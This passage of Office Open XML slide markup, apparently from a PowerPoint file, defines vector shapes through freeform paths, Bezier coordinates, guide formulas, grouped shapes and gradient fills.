                        <a:pt x="0" y="404"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="82"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="309" y="321"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="404"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/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36" name="Freeform 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8056AAD-B503-44EE-9A15-98BCC88446C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6868" y="-4784"/>
                  <a:ext cx="212" cy="263"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 76 w 90"/>
                    <a:gd name="T1" fmla="*/ 63 h 111"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 63 h 111"/>
                    <a:gd name="T4" fmla="*/ 75 w 90"/>
                    <a:gd name="T5" fmla="*/ 92 h 111"/>
                    <a:gd name="T6" fmla="*/ 48 w 90"/>
                    <a:gd name="T7" fmla="*/ 108 h 111"/>
                    <a:gd name="T8" fmla="*/ 21 w 90"/>
                    <a:gd name="T9" fmla="*/ 108 h 111"/>
                    <a:gd name="T10" fmla="*/ 5 w 90"/>
                    <a:gd name="T11" fmla="*/ 93 h 111"/>
                    <a:gd name="T12" fmla="*/ 0 w 90"/>
                    <a:gd name="T13" fmla="*/ 67 h 111"/>
                    <a:gd name="T14" fmla="*/ 6 w 90"/>
                    <a:gd name="T15" fmla="*/ 37 h 111"/>
                    <a:gd name="T16" fmla="*/ 23 w 90"/>
                    <a:gd name="T17" fmla="*/ 15 h 111"/>
                    <a:gd name="T18" fmla="*/ 48 w 90"/>
                    <a:gd name="T19" fmla="*/ 2 h 111"/>
                    <a:gd name="T20" fmla="*/ 74 w 90"/>
                    <a:gd name="T21" fmla="*/ 3 h 111"/>
                    <a:gd name="T22" fmla="*/ 88 w 90"/>
                    <a:gd name="T23" fmla="*/ 21 h 111"/>
                    <a:gd name="T24" fmla="*/ 75 w 90"/>
                    <a:gd name="T25" fmla="*/ 28 h 111"/>
                    <a:gd name="T26" fmla="*/ 65 w 90"/>
                    <a:gd name="T27" fmla="*/ 14 h 111"/>
                    <a:gd name="T28" fmla="*/ 48 w 90"/>
                    <a:gd name="T29" fmla="*/ 14 h 111"/>
                    <a:gd name="T30" fmla="*/ 28 w 90"/>
                    <a:gd name="T31" fmla="*/ 25 h 111"/>
                    <a:gd name="T32" fmla="*/ 17 w 90"/>
                    <a:gd name="T33" fmla="*/ 43 h 111"/>
                    <a:gd name="T34" fmla="*/ 14 w 90"/>
                    <a:gd name="T35" fmla="*/ 63 h 111"/>
                    <a:gd name="T36" fmla="*/ 17 w 90"/>
                    <a:gd name="T37" fmla="*/ 85 h 111"/>
                    <a:gd name="T38" fmla="*/ 29 w 90"/>
                    <a:gd name="T39" fmla="*/ 96 h 111"/>
                    <a:gd name="T40" fmla="*/ 46 w 90"/>
                    <a:gd name="T41" fmla="*/ 97 h 111"/>
                    <a:gd name="T42" fmla="*/ 66 w 90"/>
                    <a:gd name="T43" fmla="*/ 85 h 111"/>
                    <a:gd name="T44" fmla="*/ 76 w 90"/>
                    <a:gd name="T45" fmla="*/ 63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90" h="111">
                      <a:moveTo>
                        <a:pt x="76" y="63"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="63"/>
                        <a:pt x="90" y="63"/>
                        <a:pt x="90" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="75"/>
                        <a:pt x="82" y="84"/>
                        <a:pt x="75" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="100"/>
                        <a:pt x="58" y="105"/>
                        <a:pt x="48" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="37" y="111"/>
                        <a:pt x="28" y="111"/>
                        <a:pt x="21" y="108"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="106"/>
                        <a:pt x="9" y="100"/>
                        <a:pt x="5" y="93"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="85"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="0" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="56"/>
                        <a:pt x="2" y="46"/>
                        <a:pt x="6" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="28"/>
                        <a:pt x="16" y="21"/>
                        <a:pt x="23" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="9"/>
                        <a:pt x="39" y="5"/>
                        <a:pt x="48" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="0"/>
                        <a:pt x="67" y="0"/>
                        <a:pt x="74" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="81" y="7"/>
                        <a:pt x="85" y="13"/>
                        <a:pt x="88" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="28"/>
                        <a:pt x="75" y="28"/>
                        <a:pt x="75" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="21"/>
                        <a:pt x="69" y="17"/>
                        <a:pt x="65" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="12"/>
                        <a:pt x="54" y="12"/>
                        <a:pt x="48" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="16"/>
                        <a:pt x="33" y="20"/>
                        <a:pt x="28" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="30"/>
                        <a:pt x="19" y="36"/>
                        <a:pt x="17" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="50"/>
                        <a:pt x="14" y="56"/>
                        <a:pt x="14" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="72"/>
                        <a:pt x="15" y="79"/>
                        <a:pt x="17" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="91"/>
                        <a:pt x="24" y="95"/>
                        <a:pt x="29" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="98"/>
                        <a:pt x="40" y="98"/>
                        <a:pt x="46" y="97"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="95"/>
                        <a:pt x="60" y="91"/>
                        <a:pt x="66" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="71" y="79"/>
                        <a:pt x="74" y="72"/>
                        <a:pt x="76" y="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876" name="Freeform 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9AAEAC9-A839-4C3D-8587-0CB0CC2473D8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263" y="2333"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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877" name="Group 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E11283D-3D9A-43BE-9018-139B421D1F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9" y="2161"/>
                <a:ext cx="466" cy="405"/>
                <a:chOff x="1616" y="1772"/>
                <a:chExt cx="466" cy="405"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="1878" name="Group 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC246678-AA4F-465E-B8A6-5EDFDB23CA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16" y="1772"/>
                  <a:ext cx="132" cy="314"/>
                  <a:chOff x="1616" y="1772"/>
                  <a:chExt cx="132" cy="314"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1919" name="Freeform 52">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A38B0B9-9ED6-4327-8994-8EC1BC9A1C1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 flipH="1">
                    <a:off x="1655" y="1923"/>
                    <a:ext cx="60" cy="163"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 90 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 3 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 44 w 90"/>
                      <a:gd name="T17" fmla="*/ 204 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 39 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 44 w 90"/>
                      <a:gd name="T25" fmla="*/ 204 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="140"/>
                          <a:pt x="90" y="47"/>
                          <a:pt x="90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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="19"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="9"/>
                          <a:pt x="4" y="4"/>
                          <a:pt x="3" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="224"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="170"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="46"/>
                          <a:pt x="36" y="39"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="46"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="170"/>
                          <a:pt x="44" y="204"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="206"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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74118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0" name="Freeform 53">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{322457FF-CCEF-4B30-BA1E-9B7DAD460A5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 flipH="1">
                    <a:off x="1616" y="1815"/>
                    <a:ext cx="132" cy="153"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 192 w 198"/>
                      <a:gd name="T1" fmla="*/ 194 h 231"/>
                      <a:gd name="T2" fmla="*/ 169 w 198"/>
                      <a:gd name="T3" fmla="*/ 49 h 231"/>
                      <a:gd name="T4" fmla="*/ 143 w 198"/>
                      <a:gd name="T5" fmla="*/ 24 h 231"/>
                      <a:gd name="T6" fmla="*/ 100 w 198"/>
                      <a:gd name="T7" fmla="*/ 12 h 231"/>
                      <a:gd name="T8" fmla="*/ 60 w 198"/>
                      <a:gd name="T9" fmla="*/ 2 h 231"/>
                      <a:gd name="T10" fmla="*/ 30 w 198"/>
                      <a:gd name="T11" fmla="*/ 11 h 231"/>
                      <a:gd name="T12" fmla="*/ 4 w 198"/>
                      <a:gd name="T13" fmla="*/ 159 h 231"/>
                      <a:gd name="T14" fmla="*/ 36 w 198"/>
                      <a:gd name="T15" fmla="*/ 168 h 231"/>
                      <a:gd name="T16" fmla="*/ 54 w 198"/>
                      <a:gd name="T17" fmla="*/ 47 h 231"/>
                      <a:gd name="T18" fmla="*/ 53 w 198"/>
                      <a:gd name="T19" fmla="*/ 164 h 231"/>
                      <a:gd name="T20" fmla="*/ 62 w 198"/>
                      <a:gd name="T21" fmla="*/ 174 h 231"/>
                      <a:gd name="T22" fmla="*/ 113 w 198"/>
                      <a:gd name="T23" fmla="*/ 188 h 231"/>
                      <a:gd name="T24" fmla="*/ 140 w 198"/>
                      <a:gd name="T25" fmla="*/ 169 h 231"/>
                      <a:gd name="T26" fmla="*/ 140 w 198"/>
                      <a:gd name="T27" fmla="*/ 169 h 231"/>
                      <a:gd name="T28" fmla="*/ 138 w 198"/>
                      <a:gd name="T29" fmla="*/ 87 h 231"/>
                      <a:gd name="T30" fmla="*/ 136 w 198"/>
                      <a:gd name="T31" fmla="*/ 70 h 231"/>
                      <a:gd name="T32" fmla="*/ 136 w 198"/>
                      <a:gd name="T33" fmla="*/ 69 h 231"/>
                      <a:gd name="T34" fmla="*/ 136 w 198"/>
                      <a:gd name="T35" fmla="*/ 70 h 231"/>
                      <a:gd name="T36" fmla="*/ 138 w 198"/>
                      <a:gd name="T37" fmla="*/ 87 h 231"/>
                      <a:gd name="T38" fmla="*/ 159 w 198"/>
                      <a:gd name="T39" fmla="*/ 203 h 231"/>
                      <a:gd name="T40" fmla="*/ 192 w 198"/>
                      <a:gd name="T41" fmla="*/ 194 h 2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98" h="231">
                        <a:moveTo>
                          <a:pt x="192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6"/>
                          <a:pt x="143" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="135" y="21"/>
                          <a:pt x="113" y="16"/>
                          <a:pt x="100" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="88" y="9"/>
                          <a:pt x="69" y="3"/>
                          <a:pt x="60" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="51" y="0"/>
                          <a:pt x="33" y="3"/>
                          <a:pt x="30" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="28" y="17"/>
                          <a:pt x="8" y="139"/>
                          <a:pt x="4" y="159"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="180"/>
                          <a:pt x="31" y="184"/>
                          <a:pt x="36" y="168"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="40" y="157"/>
                          <a:pt x="55" y="38"/>
                          <a:pt x="54" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="53"/>
                          <a:pt x="53" y="121"/>
                          <a:pt x="53" y="164"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="169"/>
                          <a:pt x="56" y="173"/>
                          <a:pt x="62" y="174"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="74" y="177"/>
                          <a:pt x="106" y="187"/>
                          <a:pt x="113" y="188"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="121" y="190"/>
                          <a:pt x="137" y="180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0"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="78"/>
                          <a:pt x="137" y="73"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="69"/>
                          <a:pt x="136" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="137" y="75"/>
                          <a:pt x="138" y="81"/>
                          <a:pt x="138" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="141" y="109"/>
                          <a:pt x="148" y="149"/>
                          <a:pt x="159" y="203"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="165" y="231"/>
                          <a:pt x="198" y="218"/>
                          <a:pt x="192" y="194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74118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1" name="Freeform 54">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B73CFEF-4CEA-4D77-91A2-E705BCC4CC1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 flipH="1">
                    <a:off x="1662" y="1806"/>
                    <a:ext cx="43" cy="27"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 29 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 9 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 15 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 53 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 30 h 41"/>
                      <a:gd name="T10" fmla="*/ 29 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="29" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="9" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="16" y="21"/>
                          <a:pt x="13" y="16"/>
                          <a:pt x="15" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="18" y="10"/>
                          <a:pt x="53" y="0"/>
                          <a:pt x="53" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="53" y="21"/>
                          <a:pt x="47" y="25"/>
                          <a:pt x="57" y="30"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="29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2" name="Oval 55">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9E5FEE7-6711-45F3-9B0F-228FD02E55FB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gray">
                  <a:xfrm>
                    <a:off x="1659" y="1772"/>
                    <a:ext cx="52" cy="52"/>
                  </a:xfrm>
                  <a:prstGeom prst="ellipse">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:soli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3" name="Freeform 56">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C9D3AD0-FEBE-4CA2-8100-AE5D6DFBC23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 flipH="1">
                    <a:off x="1680" y="1839"/>
                    <a:ext cx="15" cy="76"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 55"/>
                      <a:gd name="T1" fmla="*/ 0 h 265"/>
                      <a:gd name="T2" fmla="*/ 14 w 55"/>
                      <a:gd name="T3" fmla="*/ 22 h 265"/>
                      <a:gd name="T4" fmla="*/ 5 w 55"/>
                      <a:gd name="T5" fmla="*/ 239 h 265"/>
                      <a:gd name="T6" fmla="*/ 29 w 55"/>
                      <a:gd name="T7" fmla="*/ 265 h 265"/>
                      <a:gd name="T8" fmla="*/ 52 w 55"/>
                      <a:gd name="T9" fmla="*/ 253 h 265"/>
                      <a:gd name="T10" fmla="*/ 38 w 55"/>
                      <a:gd name="T11" fmla="*/ 29 h 265"/>
                      <a:gd name="T12" fmla="*/ 55 w 55"/>
                      <a:gd name="T13" fmla="*/ 15 h 265"/>
                      <a:gd name="T14" fmla="*/ 0 w 55"/>
                      <a:gd name="T15" fmla="*/ 0 h 2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5" h="265">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="14" y="22"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="5" y="239"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="29" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="52" y="253"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="38" y="29"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="55" y="1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40505"/>
                  </a:solidFill>
                  <a:ln w="6350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879" name="Group 57">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF7BD553-E535-4756-AFF0-0E343F1A1C2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885" y="1851"/>
                  <a:ext cx="155" cy="263"/>
                  <a:chOff x="2191" y="2591"/>
                  <a:chExt cx="312" cy="532"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1913" name="Freeform 58">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E18CED7-A9A5-4A4D-8FF6-64F5563AEBF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2191" y="2678"/>
                    <a:ext cx="312" cy="245"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 237"/>
                      <a:gd name="T1" fmla="*/ 113 h 186"/>
                      <a:gd name="T2" fmla="*/ 235 w 237"/>
                      <a:gd name="T3" fmla="*/ 113 h 186"/>
                      <a:gd name="T4" fmla="*/ 225 w 237"/>
                      <a:gd name="T5" fmla="*/ 49 h 186"/>
                      <a:gd name="T6" fmla="*/ 199 w 237"/>
                      <a:gd name="T7" fmla="*/ 24 h 186"/>
                      <a:gd name="T8" fmla="*/ 156 w 237"/>
                      <a:gd name="T9" fmla="*/ 12 h 186"/>
                      <a:gd name="T10" fmla="*/ 116 w 237"/>
                      <a:gd name="T11" fmla="*/ 2 h 186"/>
                      <a:gd name="T12" fmla="*/ 87 w 237"/>
                      <a:gd name="T13" fmla="*/ 12 h 186"/>
                      <a:gd name="T14" fmla="*/ 73 w 237"/>
                      <a:gd name="T15" fmla="*/ 85 h 186"/>
                      <a:gd name="T16" fmla="*/ 73 w 237"/>
                      <a:gd name="T17" fmla="*/ 85 h 186"/>
                      <a:gd name="T18" fmla="*/ 72 w 237"/>
                      <a:gd name="T19" fmla="*/ 90 h 186"/>
                      <a:gd name="T20" fmla="*/ 21 w 237"/>
                      <a:gd name="T21" fmla="*/ 104 h 186"/>
                      <a:gd name="T22" fmla="*/ 26 w 237"/>
                      <a:gd name="T23" fmla="*/ 135 h 186"/>
                      <a:gd name="T24" fmla="*/ 80 w 237"/>
                      <a:gd name="T25" fmla="*/ 122 h 186"/>
                      <a:gd name="T26" fmla="*/ 80 w 237"/>
                      <a:gd name="T27" fmla="*/ 122 h 186"/>
                      <a:gd name="T28" fmla="*/ 86 w 237"/>
                      <a:gd name="T29" fmla="*/ 120 h 186"/>
                      <a:gd name="T30" fmla="*/ 99 w 237"/>
                      <a:gd name="T31" fmla="*/ 112 h 186"/>
                      <a:gd name="T32" fmla="*/ 104 w 237"/>
                      <a:gd name="T33" fmla="*/ 92 h 186"/>
                      <a:gd name="T34" fmla="*/ 104 w 237"/>
                      <a:gd name="T35" fmla="*/ 92 h 186"/>
                      <a:gd name="T36" fmla="*/ 110 w 237"/>
                      <a:gd name="T37" fmla="*/ 47 h 186"/>
                      <a:gd name="T38" fmla="*/ 109 w 237"/>
                      <a:gd name="T39" fmla="*/ 160 h 186"/>
                      <a:gd name="T40" fmla="*/ 119 w 237"/>
                      <a:gd name="T41" fmla="*/ 170 h 186"/>
                      <a:gd name="T42" fmla="*/ 169 w 237"/>
                      <a:gd name="T43" fmla="*/ 184 h 186"/>
                      <a:gd name="T44" fmla="*/ 196 w 237"/>
                      <a:gd name="T45" fmla="*/ 165 h 186"/>
                      <a:gd name="T46" fmla="*/ 196 w 237"/>
                      <a:gd name="T47" fmla="*/ 160 h 186"/>
                      <a:gd name="T48" fmla="*/ 216 w 237"/>
                      <a:gd name="T49" fmla="*/ 155 h 186"/>
                      <a:gd name="T50" fmla="*/ 219 w 237"/>
                      <a:gd name="T51" fmla="*/ 154 h 186"/>
                      <a:gd name="T52" fmla="*/ 232 w 237"/>
                      <a:gd name="T53" fmla="*/ 146 h 186"/>
                      <a:gd name="T54" fmla="*/ 237 w 237"/>
                      <a:gd name="T55" fmla="*/ 124 h 186"/>
                      <a:gd name="T56" fmla="*/ 235 w 237"/>
                      <a:gd name="T57" fmla="*/ 113 h 186"/>
                      <a:gd name="T58" fmla="*/ 193 w 237"/>
                      <a:gd name="T59" fmla="*/ 75 h 186"/>
                      <a:gd name="T60" fmla="*/ 194 w 237"/>
                      <a:gd name="T61" fmla="*/ 87 h 186"/>
                      <a:gd name="T62" fmla="*/ 200 w 237"/>
                      <a:gd name="T63" fmla="*/ 123 h 186"/>
                      <a:gd name="T64" fmla="*/ 196 w 237"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 194 w 237"/>
                      <a:gd name="T67" fmla="*/ 87 h 186"/>
                      <a:gd name="T68" fmla="*/ 193 w 237"/>
                      <a:gd name="T69" fmla="*/ 75 h 186"/>
                      <a:gd name="T70" fmla="*/ 192 w 237"/>
                      <a:gd name="T71" fmla="*/ 70 h 186"/>
                      <a:gd name="T72" fmla="*/ 193 w 237"/>
                      <a:gd name="T73" fmla="*/ 75 h 1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37" h="186">
                        <a:moveTo>
                          <a:pt x="235" y="113"/>
                        </a:moveTo>
